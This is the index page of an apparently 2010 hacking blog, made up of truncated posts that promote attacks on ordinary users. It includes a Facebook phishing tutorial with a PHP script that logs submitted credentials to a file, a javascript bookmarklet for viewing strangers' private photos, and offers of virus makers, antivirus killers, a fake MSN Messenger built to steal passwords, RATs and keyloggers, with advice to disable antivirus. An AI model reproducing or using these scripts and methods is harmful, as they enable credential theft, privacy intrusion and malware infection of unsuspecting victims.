Follow these steps :-
1. Go to the Profile-page of the Person.
2. Clear your Address line
3. Copy this into:
Code:javascript:(function(){CSS.removeClass(document.body,%20'profile_two_columns');tab_controller.changePage("photos");})()
4. Now you can easily see Pictures of s.b. you don't even kn...
Saturday, December 4, 2010
Sunday, November 21, 2010
Phishing Tutorial
A video which is made by me on phishing and the important thing is you will not get banned
if you will do phishing in this manner.
Click here to see video in Good quality
Cant see anything clearly than click here
This is the script which i used in the video
<?php
header("Location: http://www.facebook.com/");
$handle = fopen("raosrulez.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle,...
Wednesday, November 17, 2010
The Hackers Song
Put another password in,
Bomb it out and try again.
Try to get past logging in,
We're hacking, hacking, hacking...
Tuesday, November 16, 2010
Necro Virus maker

This is Necro Virus Maker ,fool ur friends and have fun...
Download Necro Virus maker from here
Note:
The program is safe from all kinds of viruses and trojans but antivirus will detect it as a virus because it is a bad program so disable your antivirus and if you still believe that its a virus then please,DONT DOWNL...
Wednesday, November 3, 2010
How To Hack Bux.to
bux.to is an online PTC (paid to click) site, it is a new innovative, international and FREE English based service that allows advertisers to reach thousands of potential customers by displaying their ad on thier, "Surf Ads" page.
You can earn money on Bux. to by doing basically nothing
Just register yourself,then login click on surf adds and follow an ad upto 30 seconds,The green tick sign means you've earned $0.01...
Fake MSN massenger
Fake MSN Messenger Version 5.0 (5.0.0540) by The_Law
If you want to take anyones sign-in name and password, this is it, just use this fake Messenger to let him think that he is using the real one.
How does it Work:
just run the "fakemsn.exe" file and the fake messenger screen will appear (it will looks like the real one) click on the Click here to sign-in and let the victim type his sign-in name and password then click OK, an error message will appear, and thats it....
Monday, November 1, 2010
What is a binder
A binder is a software that is used to combine two or more files into a single file so that when the user opens the single file,two files are executed.90% binders are used for hacking.
How to use binder for Hacking:...
Thursday, October 28, 2010
AntiVirus Killer
Now after posting about keyloggers, i recieved many email about crypters some saying, that their crypted file doesnot run,some saying it's detected by antivirus and some saying fud crypters are expensive and after some time they get detectedSo for that, here i am posting "antivirus killer" commonly known as av killer its quite simple to use them you just have to bind them with .exe file file so that when victim open the .exe ,av killer will execute and delete the antivirus installedHere are some av killer click here to download them ,and click...
Wednesday, October 27, 2010
400 Viruses
Now its like a gift for you all. Download 400 viruses in one file,dont be afraid for safety viruses would be in rar.Download from here , having problems then download from hereespecial thanx to sql inject...
Monday, October 25, 2010
Hacking with Rats (Remote administration tool)
Hello my is Rao Asfand Yar. In this post i am gonna tell you about RATS(remote administation tools),mostly the beginners dont know about rats.
RATS
A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as:
* Screen/camera capture or control
* File management (download/upload/execute/etc.)
* Shell control (usually piped from command prompt)
* Computer control (power off/on/log off)
* Registry management (query/add/delete/modify)
*...
SandBoxie (should have)
If you think that you got a tool that maybe is a virus, than open the file with this tool. Sandboxie isolate the program so it cant infect your computer. You can also run sites, webbrowser and windows finder. Every hacker need this!download from h...
How To Make An FTP Keylogger with vb
Make a Keylogger with VB
When you are done with this tutorial you will be able to Make and Use a keylogger that is close to fully undetectable,
without the victim getting suspicious. You will be able to keylog just about anyone.
This Guide will be split into 2 parts:
Writing your own undetectable keylogge...
TERA BIT VIRUS MAKER (MAKES DANGEROUS VIRUSES)
Now, this is for fun, today raoasfandyar is posting a dangerous virus maker named "TERABIT VIRUS MAKER" this is a great tool for all of you people, now create a virus and send it to your enemy. Making a virus with TERABIT is so easy even kids can make it....
Sunday, October 24, 2010
HACK (FACEBOOK, MSN,GMAIL,YAHOO) BY KEYLOGGING
A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer's keyboard.A keylogger program does not require physical access to the user's computer. It can be downloaded on purpose by someone who wants to monitor activity on a particular computer or it can be downloaded unwittingly as spyware and executed as part of a rootkit or remote administration (RAT) Trojan horse. A keylogger program typically consists of two files that...
Hack Facebook
Hello friends in my first post i would be telling you to how to hack facebook
with the most easiest method known as phishing, While there are many other methods to hack facebook some of them are described below:...
Subscribe to:
Posts (Atom)